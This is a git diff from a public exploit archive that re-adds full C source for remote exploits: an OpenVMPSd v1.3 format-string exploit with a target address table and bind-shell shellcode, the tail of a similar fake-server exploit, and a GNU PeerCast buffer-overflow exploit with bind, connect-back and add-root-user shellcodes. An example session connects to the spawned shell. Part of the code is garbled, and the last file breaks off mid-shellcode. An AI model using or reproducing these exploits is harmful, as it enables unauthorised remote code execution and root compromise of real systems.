int addrlen = sizeof(struct sockaddr_in); + struct hostent *he; + + localaddr.sin_family = AF_INET; + localaddr.sin_port = htons(DEFAULT_PORT); + localaddr.sin_addr.s_addr = INADDR_ANY; + bzero(&(localaddr.sin_zero), 8); + + fprintf(stdout,"[*] Creating Fake Server : "); + + if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) { + perror(" socket()"); + printf("\n"); + exit(1); + } + + if (setsockopt(sock, SOL_SOCKET, SO_REUSEADDR, &reuseaddr, + (socklen_t)sizeof(reuseaddr)) < 0) { + perror(" setsockopt()"); + printf("\n"); + exit(1); + } + + if (bind(sock, (struct sockaddr *)&localaddr, sizeof(localaddr)) < 0) { + perror(" bind()"); + printf("\n"); + exit(1); + } + + if (listen(sock, 1) < 0) { + perror(" listen()"); + printf("\n"); + exit(1); + } + + fprintf(stdout, "done\n"); + + printf("[*] Waiting Client : "); + fflush(stdout); + + if ((newsock = accept(sock, (struct sockaddr *)&remoteaddr, &addrlen)) < 0) { + perror(" accept()"); + printf("\n"); + exit(1); + } + + if (getpeername(newsock, (struct sockaddr *)&remoteaddr, &addrlen) < 0) { + perror(" getpeername()"); + printf("\n"); + exit(1); + } + + fprintf(stdout, "done\n"); + + fprintf(stdout, "[*] Host Connected : %s:%u\n", inet_ntoa(remoteaddr.sin_addr), ntohs(remoteaddr.sin_port)); + + fprintf(stdout, "[*] Sending EvilBuffer : "); + if(send(newsock,EvilBuffer,strlen(EvilBuffer)+1,0) == -1) { + fatal("send()"); + } + + fprintf(stdout, "done\n\n"); + + memset(EvilBuffer, 0x00, sizeof(EvilBuffer)); + strcpy(EvilBuffer, (char *)inet_ntoa(remoteaddr.sin_addr)); + + close(newsock); + + sleep(1); + + newsock = ConectToShell(EvilBuffer,BindPort); + + if(newsock == -1) { + fprintf(stdout,"[*] Exploit Failed.\n\n"); + exit(0); + } + else { + fprintf(stdout,"[*] Spawning Shell...\n\n"); + ExecuteShell(newsock); + close(newsock); + } + + fflush(stdout); +} + +int CreateEvilBuffer(int GOT, int RETADDR, int POP, int BINDTOPORT, char *buffer) +{ + char *nops = malloc(NOPSIZE+1); + char *ptr; + unsigned short *len; + unsigned short *portPtr = (unsigned short *)(shellcode+PORT_OFFSET); + + // Fix shellcode + *portPtr = htons(BINDTOPORT); + + ptr = buffer; + + // Create Nops + bzero(nops,NOPSIZE+1); + memset(nops,NOP,NOPSIZE); + + fprintf(stdout, "[*] Creating EvilBuffer : "); + + // Create format string attack + sprintf(ptr,"WHATIDO " + PAD + "%c%c%c%c" + "%c%c%c%c" + "%%.%dd" + "%%%d$hn" + "%%.%dd" + "%%%d$hn" + "%s%s", + ((u_long)GOT), + ((u_long)GOT >> 8), + ((u_long)GOT >> 16), + ((u_long)GOT >> 24), + ((u_long)GOT+2), + (((u_long)GOT+2) >> 8), + (((u_long)GOT+2) >> 16), + (((u_long)GOT+2) >> 24), + ((RETADDR & 0x0000FFFF) - 26), + POP, + (((RETADDR & 0xFFFF0000)>>16) + 0x10000 - (RETADDR & 0x0000FFFF)), + POP+1,nops,shellcode); + fprintf(stdout, "done\n"); + fflush(stdout); + + return (strlen(ptr)); +} + +int ConectToShell(char *Host,int Port) +{ + struct sockaddr_in server; + struct hostent *hp; + int s; + + server.sin_family = AF_INET; + hp = gethostbyname(Host); + if(!hp) return(-1); + + memcpy(&server.sin_addr,hp->h_addr,hp->h_length); + server.sin_port = htons(Port); + + s = socket(PF_INET,SOCK_STREAM,0); + if(connect(s,(struct sockaddr *)&server, sizeof(server)) < 0) + return(-1); + + return(s); +} + +void ExecuteShell(int Sock) +{ + char buffer[1024 * 10]; + int count; + fd_set readfs; + + write(Sock,"uname -a;id\n",12); + while(1) + { + FD_ZERO(&readfs); + FD_SET(STDIN, &readfs); + FD_SET(Sock, &readfs); + if(select(Sock + 1, &readfs, NULL, NULL, NULL) > 0) + { + if(FD_ISSET(STDIN, &readfs)) + { + if((count = read(STDIN, buffer, 1024)) <= 0) + { + if(errno == EWOULDBLOCK || errno == EAGAIN) + continue; + else + { + close(Sock); + exit(-1); + } + } + write(Sock, buffer, count); + } + if(FD_ISSET(Sock, &readfs)) + { + if((count = read(Sock, buffer, 1024)) <= 0) + { + if(errno == EWOULDBLOCK || errno == EAGAIN) + continue; + else + { + close(Sock); + exit(-1); + } + } + write(STDOUT, buffer, count); + } + } + } +} + +void fatal(char *ErrorMsg) +{ + fprintf(stderr,"ERROR - %s\n\n",ErrorMsg); + exit(1); +} + + +void Usage(char *Prog) +{ + int i; + fprintf(stderr, "Usage: %s \n\n" + "Options:\n\n" + " -t target : Select the target\n" + " -p portnumber : Sets a new port number \n" + " -r bindport : Sets the port to bind a shell \n\n" + "Targets:\n\n",Prog,DEFAULT_PORT,BIND_PORT); + + for(i=0;;i++) + { + if(Targets[i].Name != 0) + fprintf(stderr," [%u] %s\n",i,Targets[i].Name); + else + break; + } + fprintf(stderr,"\n"); + exit(1); +} + +// milw0rm.com [2006-02-10] diff --git a/platforms/linux/remote/1487.c b/platforms/linux/remote/1487.c index b0b011046..fc0a38c60 100755 --- a/platforms/linux/remote/1487.c +++ b/platforms/linux/remote/1487.c @@ -1,347 +1,347 @@ -/* - * gexp-openvmpsd.c - * - * OpenVMPSd v1.3 Remote Format String Exploit - * Copyright (C) 2005 Gotfault Security - * - * Bug found and developed by: barros and xgc - * - * Original Reference: - * http://gotfault.net/research/exploit/gexp-openvmpsd.c - * - */ - -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -/*==[ Prototypes ]==*/ -void Usage(char *); -void fatal(char *); -int CreateEvilBuffer(int, int, int, int, char *); -void ExecuteShell(int); -void SendBuffer(int , char *, int); -int CreateUdpSocket(void); -int ConectToHost(char *, int); - -/*==[ Defines ]==*/ -#define DEFAULT_PORT 1589 // Default server port -#define BIND_PORT 31337 // Default port to bind -#define NOPSIZE 50 // Do not change this value cause the shellcode space is "limited" -#define NOP 0x90 // Nop value -#define PAD "..." // Format string alignment -#define PORT_OFFSET 29 // Offset to fix the shellcode - -/*==[ Targets ]==*/ -struct -{ - char *Name; - int Gotaddr; - int Retaddr; - int Pop; -}Targets[] = - { - "OpenVMPSd v1.3 @ Slackware 10.0", - 0x0804e57c, - 0xbffff4f5, - 19, - - "OpenVMPSd v1.3 @ Debian 3.0 Linux", - 0x0804d0f8, - 0xbffff7ac, - 29, - - "OpenVMPSd v1.3 @ Fedora Core 2", - 0x0804d0f8, - 0xbffff7ac, - 19, - - // Finish - 0, - 0, - 0, - 0 - }; - -/*==[ Shellcode by Marco Ivaldi ]==*/ -char shellcode[] = - "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" - "\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\xe1\x4b\xcd\x80" - "\x89\xc7\x52\x66\x68" - "BP" // Port to bind - "\x43\x66\x53\x89\xe1\xb0\x10\x50\x51\x57\x89\xe1\xb0\x66\xcd\x80" - "\xb0\x66\xb3\x04\xcd\x80" - "\x50\x50\x57\x89\xe1\x43\xb0\x66\xcd\x80" - "\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80" - "\x41\xe2\xf8\x51\x68n/sh\x68//bi\x89\xe3\x51\x53\x89\xe1\xb0\x0b\xcd\x80"; - -/*==[ OpenVMPSd UDP packet header ]==*/ -#define SIZE_OF_HEADER 14 -char header[] = "\x41\x01\x41\x01\x41\x41\x41\x41\x00\x00\x0c\x02"; - -int main(int argc, char **argv) -{ - extern char *optarg; - extern int optind; - char opt; - char *Host = NULL; - int Port = DEFAULT_PORT; - int BindPort = BIND_PORT; - int TargetNumber = 0; - int Sock,i; - char *EvilBuffer; - int BufLen; - - fprintf(stdout,"\n--=[ OpenVMPSd Remote Format String Exploit ]\n\n"); - - // Process arguments - while ( (opt = getopt(argc,argv,"h:t:p:r:")) != EOF) - { - switch(opt) - { - case 'r': - BindPort = atoi(optarg); - if(!BindPort) Usage(argv[0]); - break; - case 'p': - Port = atoi(optarg); - if(!Port) Usage(argv[0]); - break; - case 't': - TargetNumber = atoi(optarg); - break; - case 'h': - Host = optarg; - break; - default: Usage(argv[0]); - break; - } - } - if(Host == NULL) Usage(argv[0]); - - // Verify target - for(i=0;;i++) - if(Targets[i].Name == 0) break; - if(--ih_addr,hp->h_length); - server.sin_port = htons(Port); - - s = socket(PF_INET,SOCK_DGRAM,0); - if(connect(s,(struct sockaddr *)&server, sizeof(server)) < 0) - return(-1); - - return(s); -} - -int ConectToShell(char *Host,int Port) -{ - struct sockaddr_in server; - struct hostent *hp; - int s; - - server.sin_family = AF_INET; - hp = gethostbyname(Host); - if(!hp) return(-1); - - memcpy(&server.sin_addr,hp->h_addr,hp->h_length); - server.sin_port = htons(Port); - - s = socket(PF_INET,SOCK_STREAM,0); - if(connect(s,(struct sockaddr *)&server, sizeof(server)) < 0) - return(-1); - - return(s); -} - -int CreateEvilBuffer(int GOT, int RETADDR, int POP, int BINDTOPORT, char *buffer) -{ - char *nops = malloc(NOPSIZE+1); - char *ptr; - unsigned short *len; - unsigned short *portPtr = (unsigned short *)(shellcode+PORT_OFFSET); - - // Fix shellcode - *portPtr = htons(BINDTOPORT); - - // Header - ptr = buffer; - memcpy(ptr,header,12); - ptr += SIZE_OF_HEADER; - len = (unsigned short *)(buffer + SIZE_OF_HEADER - 2); - - // Create Nops - bzero(nops,NOPSIZE+1); - memset(nops,NOP,NOPSIZE); - - // Create format string attack - sprintf(ptr, - PAD - "%c%c%c%c" - "%c%c%c%c" - "%%.%dd" - "%%%d$hn" - "%%.%dd" - "%%%d$hn" - "%s%s", - ((u_long)GOT), - ((u_long)GOT >> 8), - ((u_long)GOT >> 16), - ((u_long)GOT >> 24), - ((u_long)GOT+2), - (((u_long)GOT+2) >> 8), - (((u_long)GOT+2) >> 16), - (((u_long)GOT+2) >> 24), - ((RETADDR & 0x0000FFFF) - 9 - 63), - POP, - (((RETADDR & 0xFFFF0000)>>16) + 0x10000 - (RETADDR & 0x0000FFFF)) - 1, - POP+1,nops,shellcode); - - *len = htons(strlen(ptr)); - - return (strlen(ptr)+14); -} - -#define STDIN 0 -#define STDOUT 1 -void ExecuteShell(int Sock) -{ - char buffer[1024 * 10]; - int count; - fd_set readfs; - - write(Sock,"uname -a;id\n",12); - while(1) - { - FD_ZERO(&readfs); - FD_SET(STDIN, &readfs); - FD_SET(Sock, &readfs); - if(select(Sock + 1, &readfs, NULL, NULL, NULL) > 0) - { - if(FD_ISSET(STDIN, &readfs)) - { - if((count = read(STDIN, buffer, 1024)) <= 0) - { - if(errno == EWOULDBLOCK || errno == EAGAIN) - continue; - else - { - close(Sock); - exit(-1); - } - } - write(Sock, buffer, count); - } - if(FD_ISSET(Sock, &readfs)) - { - if((count = read(Sock, buffer, 1024)) <= 0) - { - if(errno == EWOULDBLOCK || errno == EAGAIN) - continue; - else - { - close(Sock); - exit(-1); - } - } - write(STDOUT, buffer, count); - } - } - } -} - -void fatal(char *ErrorMsg) -{ - fprintf(stderr,"ERROR - %s\n\n",ErrorMsg); - exit(1); -} - -void Usage(char *Prog) -{ - int i; - fprintf(stderr, "Usage: %s -h hostname \n\n" - "Options:\n\n" - " -t target : Select the target\n" - " -p portnumber : Sets a new port number \n" - " -r bindport : Sets the port to bind a shell \n\n" - "Targets:\n\n",Prog,DEFAULT_PORT,BIND_PORT); - - for(i=0;;i++) - { - if(Targets[i].Name != 0) - fprintf(stderr," [%u] %s\n",i,Targets[i].Name); - else - break; - } - fprintf(stderr,"\n"); - exit(1); -} - -// milw0rm.com [2006-02-10] +/* + * gexp-openvmpsd.c + * + * OpenVMPSd v1.3 Remote Format String Exploit + * Copyright (C) 2005 Gotfault Security + * + * Bug found and developed by: barros and xgc + * + * Original Reference: + * http://gotfault.net/research/exploit/gexp-openvmpsd.c + * + */ + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +/*==[ Prototypes ]==*/ +void Usage(char *); +void fatal(char *); +int CreateEvilBuffer(int, int, int, int, char *); +void ExecuteShell(int); +void SendBuffer(int , char *, int); +int CreateUdpSocket(void); +int ConectToHost(char *, int); + +/*==[ Defines ]==*/ +#define DEFAULT_PORT 1589 // Default server port +#define BIND_PORT 31337 // Default port to bind +#define NOPSIZE 50 // Do not change this value cause the shellcode space is "limited" +#define NOP 0x90 // Nop value +#define PAD "..." // Format string alignment +#define PORT_OFFSET 29 // Offset to fix the shellcode + +/*==[ Targets ]==*/ +struct +{ + char *Name; + int Gotaddr; + int Retaddr; + int Pop; +}Targets[] = + { + "OpenVMPSd v1.3 @ Slackware 10.0", + 0x0804e57c, + 0xbffff4f5, + 19, + + "OpenVMPSd v1.3 @ Debian 3.0 Linux", + 0x0804d0f8, + 0xbffff7ac, + 29, + + "OpenVMPSd v1.3 @ Fedora Core 2", + 0x0804d0f8, + 0xbffff7ac, + 19, + + // Finish + 0, + 0, + 0, + 0 + }; + +/*==[ Shellcode by Marco Ivaldi ]==*/ +char shellcode[] = + "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" + "\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\xe1\x4b\xcd\x80" + "\x89\xc7\x52\x66\x68" + "BP" // Port to bind + "\x43\x66\x53\x89\xe1\xb0\x10\x50\x51\x57\x89\xe1\xb0\x66\xcd\x80" + "\xb0\x66\xb3\x04\xcd\x80" + "\x50\x50\x57\x89\xe1\x43\xb0\x66\xcd\x80" + "\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80" + "\x41\xe2\xf8\x51\x68n/sh\x68//bi\x89\xe3\x51\x53\x89\xe1\xb0\x0b\xcd\x80"; + +/*==[ OpenVMPSd UDP packet header ]==*/ +#define SIZE_OF_HEADER 14 +char header[] = "\x41\x01\x41\x01\x41\x41\x41\x41\x00\x00\x0c\x02"; + +int main(int argc, char **argv) +{ + extern char *optarg; + extern int optind; + char opt; + char *Host = NULL; + int Port = DEFAULT_PORT; + int BindPort = BIND_PORT; + int TargetNumber = 0; + int Sock,i; + char *EvilBuffer; + int BufLen; + + fprintf(stdout,"\n--=[ OpenVMPSd Remote Format String Exploit ]\n\n"); + + // Process arguments + while ( (opt = getopt(argc,argv,"h:t:p:r:")) != EOF) + { + switch(opt) + { + case 'r': + BindPort = atoi(optarg); + if(!BindPort) Usage(argv[0]); + break; + case 'p': + Port = atoi(optarg); + if(!Port) Usage(argv[0]); + break; + case 't': + TargetNumber = atoi(optarg); + break; + case 'h': + Host = optarg; + break; + default: Usage(argv[0]); + break; + } + } + if(Host == NULL) Usage(argv[0]); + + // Verify target + for(i=0;;i++) + if(Targets[i].Name == 0) break; + if(--ih_addr,hp->h_length); + server.sin_port = htons(Port); + + s = socket(PF_INET,SOCK_DGRAM,0); + if(connect(s,(struct sockaddr *)&server, sizeof(server)) < 0) + return(-1); + + return(s); +} + +int ConectToShell(char *Host,int Port) +{ + struct sockaddr_in server; + struct hostent *hp; + int s; + + server.sin_family = AF_INET; + hp = gethostbyname(Host); + if(!hp) return(-1); + + memcpy(&server.sin_addr,hp->h_addr,hp->h_length); + server.sin_port = htons(Port); + + s = socket(PF_INET,SOCK_STREAM,0); + if(connect(s,(struct sockaddr *)&server, sizeof(server)) < 0) + return(-1); + + return(s); +} + +int CreateEvilBuffer(int GOT, int RETADDR, int POP, int BINDTOPORT, char *buffer) +{ + char *nops = malloc(NOPSIZE+1); + char *ptr; + unsigned short *len; + unsigned short *portPtr = (unsigned short *)(shellcode+PORT_OFFSET); + + // Fix shellcode + *portPtr = htons(BINDTOPORT); + + // Header + ptr = buffer; + memcpy(ptr,header,12); + ptr += SIZE_OF_HEADER; + len = (unsigned short *)(buffer + SIZE_OF_HEADER - 2); + + // Create Nops + bzero(nops,NOPSIZE+1); + memset(nops,NOP,NOPSIZE); + + // Create format string attack + sprintf(ptr, + PAD + "%c%c%c%c" + "%c%c%c%c" + "%%.%dd" + "%%%d$hn" + "%%.%dd" + "%%%d$hn" + "%s%s", + ((u_long)GOT), + ((u_long)GOT >> 8), + ((u_long)GOT >> 16), + ((u_long)GOT >> 24), + ((u_long)GOT+2), + (((u_long)GOT+2) >> 8), + (((u_long)GOT+2) >> 16), + (((u_long)GOT+2) >> 24), + ((RETADDR & 0x0000FFFF) - 9 - 63), + POP, + (((RETADDR & 0xFFFF0000)>>16) + 0x10000 - (RETADDR & 0x0000FFFF)) - 1, + POP+1,nops,shellcode); + + *len = htons(strlen(ptr)); + + return (strlen(ptr)+14); +} + +#define STDIN 0 +#define STDOUT 1 +void ExecuteShell(int Sock) +{ + char buffer[1024 * 10]; + int count; + fd_set readfs; + + write(Sock,"uname -a;id\n",12); + while(1) + { + FD_ZERO(&readfs); + FD_SET(STDIN, &readfs); + FD_SET(Sock, &readfs); + if(select(Sock + 1, &readfs, NULL, NULL, NULL) > 0) + { + if(FD_ISSET(STDIN, &readfs)) + { + if((count = read(STDIN, buffer, 1024)) <= 0) + { + if(errno == EWOULDBLOCK || errno == EAGAIN) + continue; + else + { + close(Sock); + exit(-1); + } + } + write(Sock, buffer, count); + } + if(FD_ISSET(Sock, &readfs)) + { + if((count = read(Sock, buffer, 1024)) <= 0) + { + if(errno == EWOULDBLOCK || errno == EAGAIN) + continue; + else + { + close(Sock); + exit(-1); + } + } + write(STDOUT, buffer, count); + } + } + } +} + +void fatal(char *ErrorMsg) +{ + fprintf(stderr,"ERROR - %s\n\n",ErrorMsg); + exit(1); +} + +void Usage(char *Prog) +{ + int i; + fprintf(stderr, "Usage: %s -h hostname \n\n" + "Options:\n\n" + " -t target : Select the target\n" + " -p portnumber : Sets a new port number \n" + " -r bindport : Sets the port to bind a shell \n\n" + "Targets:\n\n",Prog,DEFAULT_PORT,BIND_PORT); + + for(i=0;;i++) + { + if(Targets[i].Name != 0) + fprintf(stderr," [%u] %s\n",i,Targets[i].Name); + else + break; + } + fprintf(stderr,"\n"); + exit(1); +} + +// milw0rm.com [2006-02-10] diff --git a/platforms/linux/remote/1574.c b/platforms/linux/remote/1574.c index 77d1820db..fe441f027 100755 --- a/platforms/linux/remote/1574.c +++ b/platforms/linux/remote/1574.c @@ -1,281 +1,281 @@ -/* GNU PeerCast <= v0.1216 Remote Exploit - * ====================================== - * PeerCast is a simple, free way to listen to radio and watch video on the internet. A - * remotely exploitable buffer overflow has been identified by INFIGO-2006-03-01 which - * can be potentially exploited to execute arbitrary code due to insufficient bounds - * checking on a memory copy operation occuring on the stack. All versions upto and - * prior to v0.1216 are believed to be vulnerable. Return address does a "jmp esp" which - * references the start of our shellcode and as such will work on multiple distributions - * and VA randomized hosts. - * - * Example. - * matthew@localhost ~/code/exploits $ ./prdelka-vs-GNU-peercast -s 123.123.123.123 -c 0 -t 1 -x 31337 - * [ GNU PeerCast <= v0.1216 remote exploit - * [ Using shellcode 'Linux bind() shellcode (4444/tcp default)' (84 bytes) - * [ Using target '(GNU peercast v0.1212) 2.6.14-gentoo-r2 (Gentoo 3.3.5.20050130-r1)' - * [ Connected to 123.123.123.123 (7144/tcp) - * [ Sent 883 bytes to target - * matthew@localhost ~/code/exploits $ nc 123.123.123.123 31337 - * id - * uid=65534(nobody) gid=65534(nobody) groups=65534(nobody) - * - * -prdelka - */ -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -struct target { - char* name; - int retaddr; -}; - -struct shellcode { - char* name; - int port; - int host; - char* shellcode; -}; - -const int targetno = 2; - -struct target targets[] = { - {"(GNU peercast v0.1212) 2.4.28-gentoo-r8 (Gentoo Linux 3.3.5-r1)",0x080918AF}, - {"(GNU peercast v0.1212) 2.6.14-gentoo-r2 (Gentoo 3.3.5.20050130-r1)",0x080918AF} -}; - -const int shellno = 3; - -struct shellcode shellcodes[] = { - {"Linux bind() shellcode (4444/tcp default)",20,-1, - "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96" - "\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56" - "\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1" - "\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0" - "\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53" - "\x89\xe1\xcd\x80"}, - {"Linux connect() shellcode (4444/tcp default)",32,26, - "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x89\xe1\xcd\x80\x93\x59" - "\xb0\x3f\xcd\x80\x49\x79\xf9\x5b\x5a\x68\x01\x02\x03\x04\x66\x68" - "\x11\x5c\x43\x66\x53\x89\xe1\xb0\x66\x50\x51\x53\x89\xe1\x43\xcd" - "\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53" - "\x89\xe1\xb0\x0b\xcd\x80"}, - {"Linux add user 'syscfg' with {null} password and UID 0",-1,-1, - "\x31\xC0\x50\x68\x73\x73\x77\x64\x68\x2F\x2F\x70\x61\x68\x2F\x65" - "\x74\x63\x89\xE6\x31\xD2\x31\xC9\xB1\x01\x89\xF3\x31\xC0\xB0\x05" - "\xCD\x80\x50\x89\xE6\x31\xC0\xB0\x13\x8B\x1E\x31\xC9\x31\xD2\xB2" - "\x02\xCD\x80\x31\xC0\xB0\x04\x8B\x1E\x31\xC9\x51\x68\x61\x73\x68" - "\x0A\x68\x69\x6E\x2F\x62\x68\x74\x3A\x2F\x62\x68\x2F\x72\x6F\x6F" - "\x68\x63\x66\x67\x3A\x68\x66\x6F\x72\x20\x68\x73\x65\x72\x20\x68" - "\x65\x6D\x20\x75\x68\x73\x79\x73\x74\x68\x30\x3A\x30\x3A\x68\x66" - "\x67\x3A\x3A\x68\x73\x79\x73\x63\x89\xE1\x31\xD2\xB2\x30\xCD\x80" - "\x31\xC0\xB0\x06\x8B\x1E\xCD\x80"} -}; - -void dummyhandler(){ -} - -int main (int argc, char *argv[]) { - int sd, rc, i, c, ret, payg, paya, payb, eip, ishell = 0, port = 7144, ihost = 0, itarg = 0; - int count, offset, ioffset, index = 0; - short shellport; - char *host, *buffer, *buffer2, *payload; - struct sockaddr_in localAddr, servAddr; - struct hostent *h, *rv; - static struct option options[] = { - {"server", 1, 0, 's'}, - {"port", 1, 0, 'p'}, - {"target", 1, 0, 't'}, - {"shellcode", 1, 0, 'c'}, - {"shellport", 1, 0, 'x'}, - {"shellhost", 1, 0, 'i'}, - {"help", 0, 0,'h'} - }; - printf("[ GNU PeerCast <= v0.1216 remote exploit\n"); - while(c != -1) - { - c = getopt_long(argc,argv,"s:p:t:c:x:i:h",options,&index); - switch(c) { - case -1: - break; - case 's': - if(ihost==0){ - h = gethostbyname(optarg); - if(h==NULL){ - printf("[ Error unknown host '%s'\n",optarg); - exit(1); - } - host = malloc(strlen(optarg) + 1); - sprintf(host,"%s",optarg); - ihost = 1; - } - break; - case 'p': - port = atoi(optarg); - break; - case 'c': - if(ishell==0) - { - payg = atoi(optarg); - switch(payg){ - case 0: - printf("[ Using shellcode '%s' (%d bytes)\n",shellcodes[payg].name,strlen(shellcodes[payg].shellcode)); - payload = malloc(strlen(shellcodes[payg].shellcode)+1); - memset(payload,0,strlen(shellcodes[payg].shellcode)+1); - memcpy((void*)payload,(void*)shellcodes[payg].shellcode,strlen(shellcodes[payg].shellcode)); - ishell = 1; - break; - case 1: - printf("[ Using shellcode '%s' (%d bytes)\n",shellcodes[payg].name,strlen(shellcodes[payg].shellcode)); - payload = malloc(strlen(shellcodes[payg].shellcode)+1); - memset(payload,0,strlen(shellcodes[payg].shellcode)+1); - memcpy((void*)payload,(void*)shellcodes[payg].shellcode,strlen(shellcodes[payg].shellcode)); - ishell = 1; - break; - case 2: - printf("[ Using shellcode '%s' (%d bytes)\n",shellcodes[payg].name,strlen(shellcodes[payg].shellcode)); - payload = malloc(strlen(shellcodes[payg].shellcode)+1); - memset(payload,0,strlen(shellcodes[payg].shellcode)+1); - memcpy((void*)payload,(void*)shellcodes[payg].shellcode,strlen(shellcodes[payg].shellcode)); - ishell = 1; - break; - default: - printf("[ Invalid shellcode selection %d\n",payg); - exit(0); - break; - } - } - break; - case 'x': - if(ishell==1) - { - if(shellcodes[payg].port > -1) - { - paya = strlen(payload); - shellport = atoi(optarg); - shellport =(shellport&0xff)<<8 | shellport>>8; - memcpy(&payload[shellcodes[payg].port],&shellport,sizeof(shellport)); - if(paya > strlen(payload)) - { - printf("[ Shellcode port introduces null bytes\n"); - exit(1); - } - } - else{ - printf("[ (%s) port selection is ignored for current shellcode\n",optarg); - } - } - else{ - printf("[ No shellcode selected yet, ignoring (%s) port selection\n",optarg); - break; - } - break; - case 'i': - if(ishell==1) - { - if(shellcodes[payg].host > -1) - { - paya = strlen(payload); - rv = gethostbyname(optarg); - if(h==NULL){ - printf("[ Error unknown host '%s'\n",optarg); - exit(1); - } - memcpy(&payload[shellcodes[payg].host],rv->h_addr_list[0], rv->h_length); - if(paya > strlen(payload)) - { - printf("[ Shellhost introduces null bytes\n"); - exit(1); - } - } - else{ - printf("[ (%s) shellhost selection is ignored for current shellcode\n",optarg); - } - } - else{ - printf("[ No shellcode selected yet, ignoring (%s) shellhost selection\n",optarg); - } - break; - case 't': - if(itarg==0){ - ret = atoi(optarg); - switch(ret){ - case 0: - printf("[ Using target '%s'\n",targets[ret].name); - eip = targets[ret].retaddr; - break; - case 1: - printf("[ Using target '%s'\n",targets[ret].name); - eip = targets[ret].retaddr; - break; - default: - eip = strtoul(optarg,NULL,16); - printf("[ Using return address '0x%x'\n",eip); - break; - } - itarg = 1; - } - break; - case 'h': - printf("[ Usage instructions.\n[\n"); - printf("[ %s (optional)\n[\n[ --server|-s \n",argv[0]); - printf("[ --port|-p (port)[default 7144]\n[ --shellcode|-c \n"); - printf("[ --shellport|-x (port)\n"); - printf("[ --shellhost|-i (ip/hostname)\n"); - printf("[ --target|-t \n[\n"); - printf("[ Target#'s\n"); - for(count = 0;count <= targetno - 1;count++){ - printf("[ %d %s 0x%x\n",count,targets[count],targets[count]); - } - printf("[\n[ Shellcode#'s\n"); - for(count = 0;count <= shellno - 1;count++){ - printf("[ %d \"%s\" (length %d bytes)\n",count,shellcodes[count].name,strlen(shellcodes[count].shellcode)); - } - exit(0); - break; - default: - break; - } - } - if(itarg != 1 || ihost != 1 || ishell != 1){ - printf("[ Error insufficient arguements, try running '%s --help'\n",argv[0]); - exit(1); - } - signal(SIGPIPE,dummyhandler); - servAddr.sin_family = h->h_addrtype; - memcpy((char *) &servAddr.sin_addr.s_addr, h->h_addr_list[0], h->h_length); - servAddr.sin_port = htons(port); - sd = socket(AF_INET, SOCK_STREAM, 0); - if(sd<0) { - printf("[ Cannot open socket\n"); - exit(1); - } - rc = connect(sd, (struct sockaddr *) &servAddr, sizeof(servAddr)); - if(rc<0) { - printf("[ Cannot connect\n"); - exit(1); - } - printf("[ Connected to %s (%d/tcp)\n",host,port); - buffer = malloc(2048 + strlen(payload) + sizeof(eip)); - memset(buffer,0,2048 + strlen(payload) + sizeof(eip)); - strcpy(buffer,"GET /stream/?"); - for(count = 0;count <= 779;count++){ - strcat(buffer,"A"); - } - buffer2 = (char*)((int)buffer + (int)strlen(buffer)); - memcpy((void*)buffer2,(void*)&eip,sizeof(eip)); - buffer2 = (char*)((int)buffer2 + sizeof(eip)); - memcpy((void*)buffer2,(void*)payload,strlen(payload)); - strcat(buffer2,"\r\n"); - rc = send(sd,buffer,strlen(buffer),0); - printf("[ Sent %d bytes to target\n",rc); -} - -// milw0rm.com [2006-03-11] +/* GNU PeerCast <= v0.1216 Remote Exploit + * ====================================== + * PeerCast is a simple, free way to listen to radio and watch video on the internet. A + * remotely exploitable buffer overflow has been identified by INFIGO-2006-03-01 which + * can be potentially exploited to execute arbitrary code due to insufficient bounds + * checking on a memory copy operation occuring on the stack. All versions upto and + * prior to v0.1216 are believed to be vulnerable. Return address does a "jmp esp" which + * references the start of our shellcode and as such will work on multiple distributions + * and VA randomized hosts. + * + * Example. + * matthew@localhost ~/code/exploits $ ./prdelka-vs-GNU-peercast -s 123.123.123.123 -c 0 -t 1 -x 31337 + * [ GNU PeerCast <= v0.1216 remote exploit + * [ Using shellcode 'Linux bind() shellcode (4444/tcp default)' (84 bytes) + * [ Using target '(GNU peercast v0.1212) 2.6.14-gentoo-r2 (Gentoo 3.3.5.20050130-r1)' + * [ Connected to 123.123.123.123 (7144/tcp) + * [ Sent 883 bytes to target + * matthew@localhost ~/code/exploits $ nc 123.123.123.123 31337 + * id + * uid=65534(nobody) gid=65534(nobody) groups=65534(nobody) + * + * -prdelka + */ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +struct target { + char* name; + int retaddr; +}; + +struct shellcode { + char* name; + int port; + int host; + char* shellcode; +}; + +const int targetno = 2; + +struct target targets[] = { + {"(GNU peercast v0.1212) 2.4.28-gentoo-r8 (Gentoo Linux 3.3.5-r1)",0x080918AF}, + {"(GNU peercast v0.1212) 2.6.14-gentoo-r2 (Gentoo 3.3.5.20050130-r1)",0x080918AF} +}; + +const int shellno = 3; + +struct shellcode shellcodes[] = { + {"Linux bind() shellcode (4444/tcp default)",20,-1, + "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96" + "\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56" + "\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1" + "\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0" + 